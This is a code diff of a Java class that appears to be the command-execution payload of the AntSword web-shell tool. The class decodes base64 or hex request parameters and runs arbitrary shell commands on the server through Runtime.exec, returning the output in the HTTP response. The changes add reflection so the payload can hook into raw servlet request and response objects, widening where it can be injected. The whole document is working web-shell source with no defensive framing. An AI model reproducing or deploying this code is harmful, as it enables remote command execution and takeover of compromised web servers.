@@ -1,23 +1,53 @@
-import javax.servlet.ServletRequest;
-import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
 import javax.servlet.jsp.PageContext;
 import java.io.BufferedReader;
 import java.io.ByteArrayOutputStream;
 import java.io.InputStream;
 import java.io.InputStreamReader;
+import java.lang.reflect.Field;
 import java.util.HashMap;
 import java.util.Map;
 
 public class Exec {
+    public HttpServletRequest request = null;
+    public HttpServletResponse response = null;
     public String encoder;
     public String cs;
     public String randomPrefix;
 
     @Override
     public boolean equals(Object obj) {
-        PageContext page = (PageContext) obj;
-        ServletRequest request = page.getRequest();
-        ServletResponse response = page.getResponse();
+        if (obj instanceof PageContext) {
+            PageContext page = (PageContext) obj;
+            request = (HttpServletRequest) page.getRequest();
+            response = (HttpServletResponse) page.getResponse();
+        } else if (obj instanceof HttpServletRequest) {
+            request = (HttpServletRequest) obj;
+            try {
+                Field req = request.getClass().getDeclaredField("request");
+                req.setAccessible(true);
+                HttpServletRequest request2 = (HttpServletRequest) req.get(request);
+                Field resp = request2.getClass().getDeclaredField("response");
+                resp.setAccessible(true);
+                response = (HttpServletResponse) resp.get(request2);
+            } catch (Exception e) {
+                e.printStackTrace();
+            }
+
+        } else if (obj instanceof HttpServletResponse) {
+            response = (HttpServletResponse) obj;
+            try {
+                Field resp = response.getClass().getDeclaredField("response");
+                resp.setAccessible(true);
+                HttpServletResponse response2 = (HttpServletResponse) resp.get(response);
+                Field req = response2.getClass().getDeclaredField("request");
+                req.setAccessible(true);
+                request = (HttpServletRequest) req.get(response2);
+            } catch (Exception e) {
+                e.printStackTrace();
+            }
+        }
         randomPrefix = "antswordrandomPrefix";
         encoder = "base64";
         cs = "antswordCharset";
@@ -32,26 +62,26 @@ public class Exec {
             response.setContentType("text/html");
             request.setCharacterEncoding(cs);
             response.setCharacterEncoding(cs);
-            String z1 = EC(decode(request.getParameter(varkey1) + "", encoder, cs), encoder, cs);
-            String z2 = EC(decode(request.getParameter(varkey2) + "", encoder, cs), encoder, cs);
-            String z3 = EC(decode(request.getParameter(varkey3) + "", encoder, cs), encoder, cs);
+            String z1 = EC(decode(request.getParameter(varkey1) + ""));
+            String z2 = EC(decode(request.getParameter(varkey2) + ""));
+            String z3 = EC(decode(request.getParameter(varkey3) + ""));
             output.append(tag_s);
-            sb.append(ExecuteCommandCode(z1, z2, z3, cs));
+            sb.append(ExecuteCommandCode(z1, z2, z3));
             output.append(sb.toString());
             output.append(tag_e);
-            page.getOut().print(output.toString());
+            response.getWriter().print(output.toString());
         } catch (Exception e) {
             sb.append("ERROR" + ":// " + e.toString());
         }
         return true;
     }
 
-    String EC(String s, String encoder, String cs) throws Exception {
-        if (encoder.equals("hex") || encoder == "hex") return s;
+    String EC(String s) throws Exception {
+        if (encoder.equals("hex")) return s;
         return new String(s.getBytes(), cs);
     }
 
-    String decode(String str, String encode, String cs) throws Exception {
+    String decode(String str) throws Exception {
         int prefixlen = 0;
         try {
             prefixlen = Integer.parseInt(randomPrefix);
@@ -59,8 +89,8 @@ public class Exec {
         } catch (Exception e) {
             prefixlen = 0;
         }
-        if (encode.equals("hex") || encode == "hex") {
-            if (str == "null" || str.equals("null")) {
+        if (encoder.equals("hex")) {
+            if (str == null || str.equals("")) {
                 return "";
             }
             String hexString = "0123456789ABCDEF";
@@ -72,25 +102,22 @@ public class Exec {
                 baos.write((hexString.indexOf(str.charAt(i)) << 4 | hexString.indexOf(str.charAt(i + 1))));
             }
             return baos.toString("UTF-8");
-        } else if (encode.equals("base64") || encode == "base64") {
+        } else if (encoder.equals("base64")) {
             byte[] bt = null;
-            String version = System.getProperty("java.version");
-            if (version.compareTo("1.9") >= 0) {
-                Class Base64 = Class.forName("java.util.Base64");
-                Object Decoder = Base64.getMethod("getDecoder", new Class[0]).invoke(Base64, new  Object[]{});
-                bt = (byte[])Decoder.getClass().getMethod("decode", String.class).invoke(Decoder, str);   
-            } else {
-                Class Base64 = Class.forName("sun.misc.BASE64Decoder");
-                Object Decoder = Base64.getDeclaredConstructor().newInstance();
-                bt = (byte[])Decoder.getClass().getMethod("decodeBuffer", String.class).invoke(Decoder, str);
+            try {
+                Class clazz = Class.forName("sun.misc.BASE64Decoder");
+                bt = (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
+            } catch (ClassNotFoundException e) {
+                Class clazz = Class.forName("java.util.Base64");
+                Object decoder = clazz.getMethod("getDecoder").invoke(null);
+                bt = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
             }
-            
             return new String(bt, "UTF-8");
         }
         return str;
     }
 
-    String ExecuteCommandCode(String cmdPath, String command, String envstr, String cs) throws Exception {
+    String ExecuteCommandCode(String cmdPath, String command, String envstr) throws Exception {
         StringBuffer sb = new StringBuffer("");
         String[] c = {cmdPath, !isWin() ? "-c" : "/c", command};
         Map<String, String> readonlyenv = System.getenv();
@@ -98,7 +125,7 @@ public class Exec {
         String[] envs = envstr.split("\\|\\|\\|asline\\|\\|\\|");
         for (int i = 0; i < envs.length; i++) {
             String[] es = envs[i].split("\\|\\|\\|askey\\|\\|\\|");
-            if (es.length == 2){
+            if (es.length == 2) {
                 cmdenv.put(es[0], es[1]);
             }
         }
@@ -109,20 +136,20 @@ public class Exec {
             i++;
         }
         Process p = Runtime.getRuntime().exec(c, e);
-        CopyInputStream(p.getInputStream(), sb, cs);
-        CopyInputStream(p.getErrorStream(), sb, cs);
+        CopyInputStream(p.getInputStream(), sb);
+        CopyInputStream(p.getErrorStream(), sb);
         return sb.toString();
     }
 
     boolean isWin() {
-        String osname = (String) System.getProperty("os.name");
+        String osname = System.getProperty("os.name");
         osname = osname.toLowerCase();
         if (osname.startsWith("win"))
             return true;
         return false;
     }
 
-    void CopyInputStream(InputStream is, StringBuffer sb, String cs) throws Exception {
+    void CopyInputStream(InputStream is, StringBuffer sb) throws Exception {
         String l;
         BufferedReader br = new BufferedReader(new InputStreamReader(is, cs));
         while ((l = br.readLine()) != null) {
